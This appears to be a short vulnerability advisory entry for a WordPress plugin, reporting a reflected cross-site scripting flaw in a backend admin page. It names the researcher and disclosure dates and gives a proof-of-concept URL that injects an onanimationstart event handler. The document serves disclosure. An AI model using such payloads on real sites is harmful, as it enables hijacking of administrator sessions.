The plugin does not escape a parameter before outputting it back in an attribute of a backend page, leading to a Reflected Cross-Site Scripting
http://example.com/wp-admin/admin.php?page=wp-hide-cdn&component=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x
Krzysztof Zając
Krzysztof Zając
Yes
2022-08-08 (about 1 years ago)
2022-08-08 (about 1 years ago)
2023-04-12 (about 5 months ago)